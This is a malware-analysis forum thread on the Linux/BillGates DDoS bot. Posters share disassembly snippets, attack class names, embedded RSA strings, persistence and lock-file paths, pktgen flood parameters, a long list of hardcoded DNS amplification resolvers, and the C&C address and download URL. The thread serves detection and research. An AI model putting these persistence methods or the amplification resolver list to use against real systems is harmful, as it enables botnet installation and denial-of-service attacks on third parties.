Linux/BillGates

Forum for analysis and discussion about malware.
Post Reply
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Linux/BillGates

Post by unixfreaxjp » Mon Aug 11, 2014 6:05 pm

Basic information:
http://habrahabr.ru/post/213973/ (in Russian, if I could read it by Google tranlslate, so can you! It's good info)
http://securelist.com/analysis/publicat ... for-linux/
Sadly both articles not describing any samples.

Attached two samples:
1. Sample from MMD teammates blog article: http://digiforensics.blogspot.jp/2014/0 ... 1.html?m=1
Infection vector: hacked SSH
VT (4/53) : https://www.virustotal.com/en/file/1ac1 ... /analysis/

My snip of analysis reversed code, in order to recognize the threat (only):

Code: Select all

;; Rick: Backdoor is formed from here
:: Rick: Section Header: .text
:: Rick: supose to open the TCP/10809

0x8057D40                 public _Z12MainBackdoorv
0x8057D40 var_10          = dword ptr -10h
0x8057D40 var_C           = dword ptr -0Ch
0x8057D40 var_8           = dword ptr -8
0x8057D40 var_4           = dword ptr -4
0x8057D40
0x8057D40    push    ebp
0x8057D41    mov     ebp, esp
0x8057D43    push    ebx
0x8057D44    sub     esp, 14h
0x8057D47    sub     esp, 8
0x8057D4A    push    0
0x8057D4C    push    1
0x8057D4E    call    daemon ;; rik: It'sdaemonized, long function w/stdout to /dev/null

// Interesting hashes for further cracking ;-)))

0x8057D53    add     esp, 10h
0x8057D56    shr     eax, 1Fh
0x8057D59    test    al, al
0x8057D5B    jnz     loc_8057EF0
0x8057D61    sub     esp, 4
0x8057D64    push    offset aB82b4cc4791409 ; offset contains = "B82B4CC4791409B3A7A71D9293700136DE2CD2A"...
0x8057D69    push    offset aA9ea3ea8e500ae ; offset contains = "A9EA3EA8E500AEBAA810A4681FC2C6283E68290"...
0x8057D6E    push    offset a4d00a8e73e9622 ; offset contains = "4D00A8E73E96222FCF1044DA93C0270FD6FB6BF"...

// initiation, prep the /var/run (lock) & PID...

0x8057D73     call    _ZN8CSysTool8SelfInitEPKcS1_S1_
0x8057D78     add     esp, 10h
0x8057D7B     lea     eax, [ebp+var_8]
0x8057D7E     sub     esp, 8
0x8057D81     push    offset aGetty   ; contains string: "getty"
0x8057D86     push    eax
0x8057D87     call    _ZN8CSysTool19GetBackDoorLockFileEPKc ; file locked...
0x8057D8C     add     esp, 0Ch
0x8057D8F     sub     esp, 0Ch
0x8057D92     lea     eax, [ebp+var_8]
0x8057D95     push    eax
0x8057D96     call    _ZNKSs5c_strEv
0x8057D9B     add     esp, 10h
0x8057D9E     sub     esp, 0Ch
0x8057DA1     push    eax             ; contains offset pathname (locking)
0x8057DA2     call    _ZN8CSysTool10IsPidExistEPKc
0x8057DA7     add     esp, 10h
0x8057DAA     test    al, al
0x8057DAC     jz      short loc_8057DB3
0x8057DAE     jmp     loc_8057EE1

// toying with lock PID still...

0x8057DB3 loc_8057DB3:          
0x8057DB3     sub     esp, 0Ch
0x8057DB6     lea     eax, [ebp+var_8]
0x8057DB9     push    eax
0x8057DBA     call    _ZNKSs5c_strEv
0x8057DBF     add     esp, 10h
0x8057DC2     sub     esp, 8
0x8057DC5     push    offset g_iBackdoorLock ; int
0x8057DCA     push    eax             ; pathname
0x8057DCB     call    _ZN8CSysTool7MarkPidEPKcPi
0x8057DD0     add     esp, 10h
0x8057DD3     sub     esp, 8

// port...(MARKED THIS PORT NUM..)

0x8057DD6     push    offset a10809   ; offset contains strings  "10809"
                   ;; Can't miss this --> .rodata:080E0B5D a10809 db '10809',0  
                   ;;
0x8057DDB     push    offset g_strBillPort
0x8057DE0     call    _ZNSsaSEPKc
0x8057DE5     add     esp, 10h
0x8057DE8     sub     esp, 8
0x8057DEB     push    63h

// Detect selinux and

0x8057DED    push    offset aSelinux ; "selinux"
0x8057DF2    call    _ZN8CUtility12SetAutoStartEPKci
0x8057DF7    add     esp, 10h

// This is the "Bill" system can start to be traced..
// Those leads to the mining fnction works.. loooong list to paste..(skip!)
// udevd was kicked to avoid fails..

0x8057DFA   call    _ZN8CSysTool11IsBillExistEv
0x8057DFF   test    al, al
0x8057E01   jz      short loc_8057E5D
0x8057E03   lea     eax, [ebp+var_10]
0x8057E06   sub     esp, 8
0x8057E09   push    offset aUdevd   ; "udevd"
0x8057E0E   push    eax

// Condition to exit..

0x8057E0F   call    _ZN8CSysTool19GetBackDoorLockFileEPKc
0x8057E14   add     esp, 0Ch
0x8057E17   sub     esp, 0Ch
0x8057E1A   lea     eax, [ebp+var_10]
0x8057E1D   push    eax
0x8057E1E   call    _ZNKSs5c_strEv
0x8057E23   add     esp, 10h
0x8057E26   sub     esp, 0Ch
0x8057E29   push    eax             ; char *
0x8057E2A   call    _ZN8CSysTool7KillPidEPKc
0x8057E2F   add     esp, 10h 
Later on known as embedded object, in the the UPX packed, can be seen in .data parts:

Code: Select all

.data:0814E19F     0000004F C $Info: This file is packed with the UPX executable packer http://upx.sf.net $\n
.data:0814E1EE     0000004C C $Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. $\n
.data:0814E242     0000001F C PROT_EXEC|PROT_WRITE failed.\nYj

2. Sample from aassddfFFxxx,
VT (7/52) : https://www.virustotal.com/en/file/0383 ... /analysis/
Infection vector: Exploitation of ElasticSearch flaw (base: Apache)

Snip of important point in his analysis (I asked him to post in here or to his blog to add information)
Image

Sample (1) and (2) are attached.

Credit: Ken Pryor, Leon VDIjk, wirehack7, aassddffxxxx

#MalwareMustDie
You do not have the required permissions to view the files attached to this post.
Last edited by unixfreaxjp on Mon Aug 11, 2014 6:25 pm, edited 2 times in total.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Mon Aug 11, 2014 6:17 pm

Another sample.
3. Sample by Ken Pryor
VT (4/53) : https://www.virustotal.com/en/file/701e ... 401228552/
Nothing new.
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Wed Sep 03, 2014 9:04 am

Another sample x32.
VT (7/55) https://www.virustotal.com/en/file/9746 ... 409734141/

PoC:

Code: Select all

0x080FB92F \b11CUpdateBill 
0x080FB94B \b12CUpdateGates
Attack list (13 functions)

Code: Select all

0x080FB1DB  \b11CAttackBase 
0x080FB1EA  13CPacketAttack 
0x080FB207  \b10CAttackUdp
0x080FB223  \b10CAttackSyn
0x080FB23F  \b11CAttackIcmp 
0x080FB25B  \b10CAttackDns
0x080FB277  \b10CAttackAmp
0x080FB293  \b10CAttackPrx
0x080FB2AF  \b15CAttackCompress 
0x080FB2CF  \b10CTcpAttack
0x080FB2EB  \b9CAttackCc
0x080FB303  \b10CAttackTns
0x080FB31F  \b9CAttackIe
CNC: 61.147.103.21

They still need to learn more of NIX privilege more for lots of bad things their coded :-)
You do not have the required permissions to view the files attached to this post.

patriq
Posts: 108
Joined: Fri Jun 28, 2013 8:11 pm
Contact:

Re: Linux/BillGates

Post by patriq » Wed Sep 03, 2014 5:01 pm

A bit more on that C&C

Code: Select all

www.pingyan-china.com.  59      IN      A       61.147.103.21
HFS.png
Files attached.


Including some kiddie HF auto-root script as well, exploit files for it were not online. (English language)
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Wed Sep 03, 2014 9:14 pm

Thank you for your addition.
patriq wrote:Including some kiddie HF auto-root script as well, exploit files for it were not online. (English language)
Yes, we covered this CNC in here: http://yinette.github.io/blog/2014/09/0 ... t-attempt/
The BillGates sample in this mentioned CNC is actually what I previously posted here: http://www.kernelmode.info/forum/viewto ... 429#p23757
And other sample which was using the Custom UPX (GUPX!)one is that DDoS64 file, an x64, I announced here: https://www.virustotal.com/en/file/6dd9 ... /analysis/ (read VT comment) < It succeed dropping AV detection to zero. Tried to warn everyone in here: https://twitter.com/MalwareMustDie/stat ... 8720619520

We secured all exploits used. PoC is this snapshot:
Image
-which are public known kernel exploits (sites like metasploit/exploit-db/inj3ctor have these in their database & they are online accessible), I don't discuss it here for it's a different topic.
But the reason of the crook is using these sploits is simply they need to gain root privilege to install Bill.Gates properly (for the autostart, and /bin/mv some system+debugging files). PoC, it'll meet errors:

Code: Select all

write(2, "sh: 1: ", 7sh: 1: )      = 7
write(2, "cannot create /etc/rc.d/rc.local"
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
execve("/bin/mv", ["/bin/mv", "-f", "/usr/bin/xxxxx", "/usr/local/xxxxx"], [/* 20 vars*/]) = 0
brkpoint (0)                      = 0xbb6000
access("/usr/bin/xxxx", F_OK) = -1 ENOENT (No such file or directory)
...and etc etc...
In the covered case (the post that I mentioned), as per explained by the writer, the shell (not root) was gained via apache struts hacks (not w/root priv)
If any interest for the details in that custom UPX hacks pls PM me.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Wed Sep 03, 2014 9:44 pm

Tips to quicky recognize the Bill Gates ELF variant is, grep this readable strings:

Code: Select all

// $TMP & LOCKS
/tmp/notify.file
/tmp/moni.lock
/tmp/bill.lock
/tmp/gates.lock

// autostart:
#!/bin/bash\n%s\n 
/etc/rc%d.d/S%d%s 
ln -s /etc/init.d/%s %s

// drops..
/usr/bin/.sshd

// file ops:
mkdir -p %s 
cp -f %s %s 
chmod 0755 %s 
mv %s %s

// Proc packet changes:
/proc/net/pktgen/kpktgend_%d
/proc/net/pktgen/eth%d
min_pkt_size %d 
max_pkt_size %d 
src_min %s
src_max %s
udp_src_min %d
udp_src_max %d
dst %s
udp_dst_min %d
udp_dst_max %d
dst_mac %02x:%02x:%02x:%02x:%02x:%02x 
is_multi %d 
multi_dst %s
pkt_type %d 
dns_domain %s 
syn_flag %d 
is_dns_random %d
dns_type %d 
is_edns %d
edns_len %d 
is_edns_sec %d
/proc/net/pktgen/kpktgend_%d
add_device eth%d

// these RSA keys:
.rodata:0x080F2424 14BC88F8F4F502D88907B9085EBA3EA9E906C5D316067CEA69242F1D910E0CA19D1999C0ECD6BEC630764AD5DB96879D483F6C1B44E3F7A033DF51051660E4E5BB679D3C02F47B1E9940C904357AA976DD2C6ADA5998BD0817746FFB6C4D74948714DBC1A6A223900845135F7F03CD6A03631FA220A39F06B136700641193AD9
.rodata:0x080F2628 3AF43028DD9C86509C88A0F0629E7DC838AA707E756EBD78416AA17E5B10C022EE943F62A6FCDF507CB24178D044739EB676CE869D5C719A40BC38DADE461B1B
.rodata:0x080F282C 44B179144D2FCD83D7BFF1471B0EB5F46899576434D3EE96B6AB45B0F299B6C7520046C0114C3B0CE29C7EFB4C97B367CB2C96A784BB16055B7450921CE829AE2B120854A467CCDF0909127F177D905BB64DA9D254A201CA57BBD4D330310BAAB8A968F9174ED27ACF70E3F2DE6DD820C8332393036AE19F47E64AC5E54E78E 
    :
.rodata:0x080F2A78 98380E602E3C9EE44D40BCB929338BA5512DAED928828F06C4C89F39271FC5BCD47A8374BBDB6CADF6B5C2FE03F6B1DF9434D5398C9746875F3874BD18B5ACC283CA2B36CA2815FCAACD3BEC86C69F68B0CF45096DA6C96074E4D86A84221E03846E73CD84A897208BB159211E967E71DE029363F46F26F672B1A6DD0594FD01
.rodata:0x080F2C7C 3EFC4E86A5C436F2EE2A190435CE359C8D2AE1C0068CDC9462A874A64CDE661833F80B8AB264C82ECBDE9A04A474A7B05FC27DC22D90ABF6CB64AB6091648ADF
.rodata:0x080F2E80 39E43130BC6CEE20096DCA804FAD04A165230D7F77274289EF4437C7E65E7F59A53261653F547897936363E2B9B8AE577B7CECEB3716371ABCEF4F0FBBF96F7C053039D2ADA435026806FD11194C93A4949D3AB0628D0EA2E8705943EB2F5181E1E50764E13130FDE5926D7B0EE70642B11ECF6C99A73F36EF9962489B42DED3

User avatar
fade
Posts: 10
Joined: Tue Jun 24, 2014 3:12 am

Re: Linux/BillGates

Post by fade » Tue Sep 09, 2014 2:01 pm

Someone I believe has written tracking code for this botnet also:
https://github.com/ValdikSS/billgates-botnet-tracker

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Thu Sep 11, 2014 4:16 am

Download source was: http://218.25.36.220:630/mix (tangoed down)
VT: https://www.virustotal.com/en/file/4060 ... 409504811/
The attack functions (a set of 12 bruter methods)

Code: Select all

.rodata:0x80F18FC   0x00E C 11CAttackBase
.rodata:0x80F190A   0x010 C 13CPacketAttack
.rodata:0x80F1928   0x00D C 10CAttackUdp
.rodata:0x80F1944   0x00D C 10CAttackSyn
.rodata:0x80F1960   0x00E C 11CAttackIcmp
.rodata:0x80F197C   0x00D C 10CAttackDns
.rodata:0x80F1998   0x00D C 10CAttackAmp
.rodata:0x80F19B4   0x00D C 10CAttackPrx
.rodata:0x80F19D0   0x012 C 15CAttackCompress
.rodata:0x80F19F0   0x00D C 10CTcpAttack
.rodata:0x80F1A0C   0x00B C 9CAttackCc
.rodata:0x80F1A24   0x00B C 9CAttackIe
RSA:

Code: Select all

.rodata:0x80F2424   0x101 C
14BC88F8F4F502D88907B9085EBA3EA9E906C5D316067CEA69242F1D910E0CA19D1999C0ECD6BEC630764AD5DB96879D483F6C1B44E3F7A033DF51051660E4E5BB679D3C02F47B1E9940C904357AA976DD2C6ADA5998BD0817746FFB6C4D74948714DBC1A6A223900845135F7F03CD6A03631FA220A39F06B136700641193AD9
.rodata:0x80F2628   0x081 C
3AF43028DD9C86509C88A0F0629E7DC838AA707E756EBD78416AA17E5B10C022EE943F62A6FCDF507CB24178D044739EB676CE869D5C719A40BC38DADE461B1B
.rodata:0x80F282C   0x101 C
1013B59504004E7CCF52498E26A3545EC723848041723353C4BE0C6194C266B6D957706769A28060AF74E6776F4019D152A052E226C8FFC7EFF1A2951D47CAA2EDADDAE4B2EA379A59152E866A3150EC6051C392E519E1CBD438FF736B3CA9C0454727C15A6F06DEBD28E914EE6127CF215062FCF27D688A5A6216875049CE84
Installation & PoC of BillGates for AV ppl to see, this is NOT "Elknot" (see VT result) and dont call every China DDOSer as "Elknot"..confusing.

Code: Select all

/etc/init.d/
#!/bin/bash\n%s\n
/etc/rc%d.d/S%d%s
ln -s /etc/init.d/%s %s
(and the database below:)
(56): . rodata:0x80F2A2D   0x00F C /tmp/moni.vtpg
(57): . rodata:0x80F2A3C   0x00F C /tmp/bill.vtpg
(61): . rodata:0x80F2A65   0x011 C /tmp/notify.file
(75): . rodata:0x80F37A5   0x008 C /tmp/%d
(464): .rodata:0x80F530C   0x011 C /tmp/notify.file
(469): .rodata:0x80F5C53   0x010 C /tmp/gates.vtpg
(535): .rodata:0x80F64C6   0x010 C /tmp/gates.vtpg
These system commands will be used in three operations under diff conditions:

Code: Select all

0x80Fxxxx   0x00D C /bin/netstat
0x80Fxxxx   0x00A C /bin/lsof
0x80Fxxxx  0x008 C /bin/ps
Source codes

Code: Select all

.init:080480F4 ; Source File : 'crtstuff.c'
.init:080480F4 ; Source File : 'AmpResource.cpp'
.init:080480F4 ; Source File : 'Attack.cpp'
.init:080480F4 ; Source File : 'CmdMsg.cpp'
.init:080480F4 ; Source File : 'ConfigDoing.cpp'
.init:080480F4 ; Source File : 'DNSCache.cpp'
.init:080480F4 ; Source File : 'ExChange.cpp'
.init:080480F4 ; Source File : 'Global.cpp'
.init:080480F4 ; Source File : 'Main.cpp'
.init:080480F4 ; Source File : 'Manager.cpp'
.init:080480F4 ; Source File : 'MiniHttpHelper.cpp'
.init:080480F4 ; Source File : 'ProtocolUtil.cpp'
.init:080480F4 ; Source File : 'ProvinceDns.cpp'
.init:080480F4 ; Source File : 'StatBase.cpp'
.init:080480F4 ; Source File : 'SysTool.cpp'
.init:080480F4 ; Source File : 'ThreadAtk.cpp'
.init:080480F4 ; Source File : 'ThreadClientStatus.cpp'
.init:080480F4 ; Source File : 'ThreadConnection.cpp'
.init:080480F4 ; Source File : 'ThreadFakeDetect.cpp'
.init:080480F4 ; Source File : 'ThreadHttpGet.cpp'
.init:080480F4 ; Source File : 'ThreadLoopCmd.cpp'
.init:080480F4 ; Source File : 'ThreadMonGates.cpp'
.init:080480F4 ; Source File : 'ThreadRecycle.cpp'
.init:080480F4 ; Source File : 'ThreadShell.cpp'
.init:080480F4 ; Source File : 'ThreadShellRecycle.cpp'
.init:080480F4 ; Source File : 'ThreadTask.cpp'
.init:080480F4 ; Source File : 'ThreadUpdate.cpp'
.init:080480F4 ; Source File : 'UserAgent.cpp'
.init:080480F4 ; Source File : 'AutoLock.cpp'
.init:080480F4 ; Source File : 'BigInt.cpp'
.init:080480F4 ; Source File : 'FileOp.cpp'
.init:080480F4 ; Source File : 'Log.cpp'
.init:080480F4 ; Source File : 'Media.cpp'
.init:080480F4 ; Source File : 'NetBase.cpp'
.init:080480F4 ; Source File : 'RSA.cpp'
.init:080480F4 ; Source File : 'ThreadCondition.cpp'
.init:080480F4 ; Source File : 'Thread.cpp'
.init:080480F4 ; Source File : 'ThreadMutex.cpp'
.init:080480F4 ; Source File : 'Utility.cpp'
.init:080480F4 ; Source File : 'WinDefSVC.cpp'
Amps w/IP hard coded:

Code: Select all

.rodata:0x80F3AEC   0x00E C 61.132.163.68
.rodata:0x80F3AFA   0x00F C 202.102.192.68
.rodata:0x80F3B09   0x00F C 202.102.213.68
.rodata:0x80F3B18   0x010 C 202.102.200.101
.rodata:0x80F3B28   0x00B C 58.242.2.2
.rodata:0x80F3B33   0x00C C 202.38.64.1
.rodata:0x80F3B3F   0x00E C 211.91.88.129
.rodata:0x80F3B4D   0x00E C 211.138.180.2
.rodata:0x80F3B5B   0x00D C 218.104.78.2
.rodata:0x80F3B68   0x00F C 202.102.199.68
.rodata:0x80F3B77   0x00C C 202.175.3.3
.rodata:0x80F3B83   0x00C C 202.175.3.8
.rodata:0x80F3B8F   0x00F C 202.112.144.30
.rodata:0x80F3B9E   0x00B C 61.233.9.9
.rodata:0x80F3BA9   0x00C C 61.233.9.61
.rodata:0x80F3BB5   0x010 C 124.207.160.110
.rodata:0x80F3BC5   0x00B C 202.97.7.6
.rodata:0x80F3BD0   0x00C C 202.97.7.17
.rodata:0x80F3BDC   0x00D C 202.106.0.20
.rodata:0x80F3BE9   0x00F C 202.106.46.151
.rodata:0x80F3BF8   0x00F C 202.106.195.68
.rodata:0x80F3C07   0x010 C 202.106.196.115
.rodata:0x80F3C17   0x010 C 202.106.196.212
.rodata:0x80F3C27   0x010 C 202.106.196.228
.rodata:0x80F3C37   0x010 C 202.106.196.230
.rodata:0x80F3C47   0x010 C 202.106.196.232
.rodata:0x80F3C57   0x010 C 202.106.196.237
.rodata:0x80F3C67   0x00F C 202.112.112.10
.rodata:0x80F3C76   0x00F C 211.136.17.107
.rodata:0x80F3C85   0x00F C 211.136.28.231
.rodata:0x80F3C94   0x00F C 211.136.28.234
.rodata:0x80F3CA3   0x00F C 211.136.28.237
.rodata:0x80F3CB2   0x00C C 211.147.6.3
.rodata:0x80F3CBE   0x00F C 219.141.136.10
.rodata:0x80F3CCD   0x00F C 219.141.140.10
.rodata:0x80F3CDC   0x00F C 219.141.148.37
.rodata:0x80F3CEB   0x00F C 219.141.148.39
.rodata:0x80F3CFA   0x00E C 219.239.26.42
.rodata:0x80F3D08   0x00F C 221.130.32.100
.rodata:0x80F3D17   0x00F C 221.130.32.103
.rodata:0x80F3D26   0x00F C 221.130.32.106
.rodata:0x80F3D35   0x00F C 221.130.32.109
.rodata:0x80F3D44   0x00E C 221.130.33.52
.rodata:0x80F3D52   0x00E C 221.130.33.60
.rodata:0x80F3D60   0x00D C 221.176.3.70
.rodata:0x80F3D6D   0x00D C 221.176.3.73
.rodata:0x80F3D7A   0x00D C 221.176.3.76
.rodata:0x80F3D87   0x00D C 221.176.3.79
.rodata:0x80F3D94   0x00D C 221.176.3.83
.rodata:0x80F3DA1   0x00D C 221.176.3.85
.rodata:0x80F3DAE   0x00C C 221.176.4.6
.rodata:0x80F3DBA   0x00C C 221.176.4.9
.rodata:0x80F3DC6   0x00D C 221.176.4.12
.rodata:0x80F3DD3   0x00D C 221.176.4.15
.rodata:0x80F3DE0   0x00D C 221.176.4.18
.rodata:0x80F3DED   0x00D C 221.176.4.21
.rodata:0x80F3DFA   0x00C C 58.22.96.66
.rodata:0x80F3E06   0x010 C 218.104.128.106
.rodata:0x80F3E16   0x00E C 202.101.98.55
.rodata:0x80F3E24   0x010 C 211.138.145.194
.rodata:0x80F3E34   0x010 C 211.138.151.161
.rodata:0x80F3E44   0x00F C 211.138.156.66
.rodata:0x80F3E53   0x00E C 218.85.152.99
.rodata:0x80F3E61   0x00E C 218.85.157.99
.rodata:0x80F3E6F   0x00D C 222.47.29.93
.rodata:0x80F3E7C   0x00F C 202.101.107.85
.rodata:0x80F3E8B   0x010 C 119.233.255.228
.rodata:0x80F3E9B   0x00E C 222.47.62.142
.rodata:0x80F3EA9   0x00E C 122.72.33.240
.rodata:0x80F3EB7   0x00E C 211.98.121.27
.rodata:0x80F3EC5   0x010 C 218.203.160.194
.rodata:0x80F3ED5   0x00C C 221.7.34.10
.rodata:0x80F3EE1   0x00D C 61.235.70.98
.rodata:0x80F3EEE   0x00F C 113.111.211.22
.rodata:0x80F3EFD   0x00E C 202.96.128.68
.rodata:0x80F3F0B   0x00E C 202.96.128.86
.rodata:0x80F3F19   0x00F C 202.96.128.166
.rodata:0x80F3F28   0x00D C 210.21.3.140
.rodata:0x80F3F35   0x00D C 210.21.4.130
.rodata:0x80F3F42   0x00E C 211.95.193.97
.rodata:0x80F3F50   0x00B C 211.98.2.4
.rodata:0x80F3F5B   0x00B C 211.98.4.1
.rodata:0x80F3F66   0x00F C 211.162.61.225
.rodata:0x80F3F75   0x00F C 211.162.61.235
.rodata:0x80F3F84   0x00F C 211.162.61.255
.rodata:0x80F3F93   0x00D C 211.162.62.1
.rodata:0x80F3FA0   0x00E C 211.162.62.60
.rodata:0x80F3FAE   0x00C C 221.4.66.66
.rodata:0x80F3FBA   0x00F C 202.103.176.22
.rodata:0x80F3FC9   0x00E C 202.96.144.47
.rodata:0x80F3FD7   0x00E C 210.38.192.33
.rodata:0x80F3FE5   0x00E C 202.96.134.33
.rodata:0x80F3FF3   0x00F C 202.96.134.133
.rodata:0x80F4002   0x00E C 202.96.154.15
.rodata:0x80F4010   0x00D C 210.21.196.6
.rodata:0x80F401D   0x00C C 221.5.88.88
.rodata:0x80F4029   0x010 C 202.103.243.112
.rodata:0x80F4039   0x00E C 202.193.64.33
.rodata:0x80F4047   0x00E C 61.235.164.13
.rodata:0x80F4055   0x00E C 61.235.164.18
.rodata:0x80F4063   0x00F C 202.103.225.68
.rodata:0x80F4072   0x00D C 221.7.136.68
.rodata:0x80F407F   0x00F C 202.103.224.68
.rodata:0x80F408E   0x00E C 211.97.64.129
.rodata:0x80F409C   0x010 C 211.138.240.100
.rodata:0x80F40AC   0x00F C 211.138.242.18
.rodata:0x80F40BB   0x010 C 211.138.245.180
.rodata:0x80F40CB   0x00D C 221.7.128.68
.rodata:0x80F40D8   0x00F C 222.52.118.162
.rodata:0x80F40E7   0x00E C 202.98.192.67
.rodata:0x80F40F5   0x00F C 202.98.198.167
.rodata:0x80F4104   0x00E C 211.92.136.81
.rodata:0x80F4112   0x00C C 211.139.1.3
.rodata:0x80F411E   0x00D C 211.139.2.18
.rodata:0x80F412B   0x00F C 202.100.192.68
.rodata:0x80F413A   0x00D C 211.97.96.65
.rodata:0x80F4147   0x00E C 211.138.164.6
.rodata:0x80F4155   0x00D C 221.11.132.2
.rodata:0x80F4162   0x00E C 202.100.199.8
.rodata:0x80F4170   0x00E C 202.99.160.68
.rodata:0x80F417E   0x00D C 202.99.166.4
.rodata:0x80F418B   0x00D C 202.99.168.8
.rodata:0x80F4198   0x010 C 222.222.222.222
.rodata:0x80F41A8   0x00F C 202.102.224.68
.rodata:0x80F41B7   0x00F C 202.102.227.68
.rodata:0x80F41C6   0x00D C 222.85.85.85
.rodata:0x80F41D3   0x00D C 222.88.88.88
.rodata:0x80F41E0   0x00D C 210.42.241.1
.rodata:0x80F41ED   0x00D C 202.196.64.1
.rodata:0x80F41FA   0x010 C 112.100.100.100
.rodata:0x80F420A   0x00E C 202.97.224.68
.rodata:0x80F4218   0x00E C 219.235.127.1
.rodata:0x80F4226   0x00D C 61.236.93.33
.rodata:0x80F4233   0x00E C 211.93.24.129
.rodata:0x80F4241   0x00F C 211.137.241.34
.rodata:0x80F4250   0x010 C 219.147.198.230
.rodata:0x80F4260   0x00D C 202.103.0.68
.rodata:0x80F426D   0x00E C 202.103.0.117
.rodata:0x80F427B   0x00E C 202.103.24.68
.rodata:0x80F4289   0x00F C 202.103.44.150
.rodata:0x80F4298   0x00E C 202.114.0.242
.rodata:0x80F42A6   0x00E C 202.114.240.6
.rodata:0x80F42B4   0x00F C 211.161.158.11
.rodata:0x80F42C3   0x00E C 211.161.159.3
.rodata:0x80F42D1   0x010 C 218.104.111.114
.rodata:0x80F42E1   0x010 C 218.104.111.122
.rodata:0x80F42F1   0x010 C 218.106.127.114
.rodata:0x80F4301   0x010 C 218.106.127.122
.rodata:0x80F4311   0x00F C 221.232.129.30
.rodata:0x80F4320   0x00D C 59.51.78.210
.rodata:0x80F432D   0x00D C 61.234.254.5
.rodata:0x80F433A   0x00F C 202.103.96.112
.rodata:0x80F4349   0x00F C 219.72.225.253
.rodata:0x80F4358   0x00F C 222.243.129.81
.rodata:0x80F4367   0x00F C 222.246.129.80
.rodata:0x80F4376   0x00F C 211.142.210.98
.rodata:0x80F4385   0x010 C 211.142.210.100
.rodata:0x80F4395   0x00E C 220.168.208.3
.rodata:0x80F43A3   0x00E C 220.168.208.6
.rodata:0x80F43B1   0x00E C 220.170.64.68
.rodata:0x80F43BF   0x00F C 218.76.192.100
.rodata:0x80F43CE   0x00C C 61.187.98.3
.rodata:0x80F43DA   0x00C C 61.187.98.6
.rodata:0x80F43E6   0x00C C 202.98.0.68
.rodata:0x80F43F2   0x00E C 211.93.64.129
.rodata:0x80F4400   0x00E C 211.141.16.99
.rodata:0x80F440E   0x00C C 202.98.5.68
.rodata:0x80F441A   0x00F C 219.149.194.55
.rodata:0x80F4429   0x00F C 211.138.200.69
.rodata:0x80F4438   0x00E C 202.102.3.141
.rodata:0x80F4446   0x00E C 202.102.3.144
.rodata:0x80F4454   0x00D C 58.240.57.33
.rodata:0x80F4461   0x00B C 112.4.0.55
.rodata:0x80F446C   0x010 C 114.114.114.114
.rodata:0x80F447C   0x010 C 114.114.115.115
.rodata:0x80F448C   0x00E C 202.102.24.34
.rodata:0x80F449A   0x00C C 218.2.135.1
.rodata:0x80F44A6   0x00B C 221.6.4.66
.rodata:0x80F44B1   0x00F C 221.131.143.69
.rodata:0x80F44C0   0x00E C 202.102.8.141
.rodata:0x80F44CE   0x00D C 222.45.0.110
.rodata:0x80F44DB   0x00B C 61.177.7.1
.rodata:0x80F44E6   0x00F C 218.104.32.106
.rodata:0x80F44F5   0x00F C 211.103.13.101
.rodata:0x80F4504   0x00E C 221.228.255.1
.rodata:0x80F4512   0x00C C 61.147.37.1
.rodata:0x80F451E   0x00C C 222.45.1.40
.rodata:0x80F452A   0x00E C 58.241.208.46
.rodata:0x80F4538   0x00E C 202.102.9.141
.rodata:0x80F4546   0x00D C 202.102.7.90
.rodata:0x80F4553   0x00F C 202.101.224.68
.rodata:0x80F4562   0x00F C 202.101.226.68
.rodata:0x80F4571   0x00E C 211.141.90.68
.rodata:0x80F457F   0x00F C 211.137.32.178
.rodata:0x80F458E   0x00D C 202.96.69.38
.rodata:0x80F459B   0x00F C 211.140.197.58
.rodata:0x80F45AA   0x00D C 219.149.6.99
.rodata:0x80F45B7   0x00D C 202.96.86.18
.rodata:0x80F45C4   0x00E C 101.47.189.10
.rodata:0x80F45D2   0x00E C 101.47.189.18
.rodata:0x80F45E0   0x00E C 118.29.249.50
.rodata:0x80F45EE   0x00E C 118.29.249.54
.rodata:0x80F45FC   0x00D C 202.96.64.68
.rodata:0x80F4609   0x00D C 202.96.75.68
.rodata:0x80F4616   0x00D C 202.118.1.29
.rodata:0x80F4623   0x00D C 202.118.1.53
.rodata:0x80F4630   0x00F C 219.148.204.66
.rodata:0x80F463F   0x00D C 202.99.224.8
.rodata:0x80F464C   0x00E C 202.99.224.67
.rodata:0x80F465A   0x00D C 211.90.72.65
.rodata:0x80F4667   0x00D C 211.138.91.1
.rodata:0x80F4674   0x00E C 218.203.101.3
.rodata:0x80F4682   0x00E C 202.100.96.68
.rodata:0x80F4690   0x00C C 211.93.0.81
.rodata:0x80F469C   0x00F C 222.75.152.129
.rodata:0x80F46AB   0x00F C 211.138.75.123
.rodata:0x80F46BA   0x00E C 202.102.154.3
.rodata:0x80F46C8   0x00E C 202.102.152.3
.rodata:0x80F46D6   0x00D C 219.146.1.66
.rodata:0x80F46E3   0x00D C 219.147.1.66
.rodata:0x80F46F0   0x00F C 202.102.128.68
.rodata:0x80F46FF   0x00F C 202.102.134.68
.rodata:0x80F470E   0x00F C 211.138.106.19
.rodata:0x80F471D   0x00D C 211.90.80.65
.rodata:0x80F472A   0x00E C 202.99.192.66
.rodata:0x80F4738   0x00E C 202.99.192.68
.rodata:0x80F4746   0x00B C 61.134.1.4
.rodata:0x80F4751   0x00D C 202.117.96.5
.rodata:0x80F475E   0x00E C 202.117.96.10
.rodata:0x80F476C   0x00D C 218.30.19.40
.rodata:0x80F4779   0x00D C 218.30.19.50
.rodata:0x80F4786   0x010 C 116.228.111.118
.rodata:0x80F4796   0x00F C 180.168.255.18
.rodata:0x80F47A5   0x00D C 202.96.209.5
.rodata:0x80F47B2   0x00F C 202.96.209.133
.rodata:0x80F47C1   0x00C C 202.101.6.2
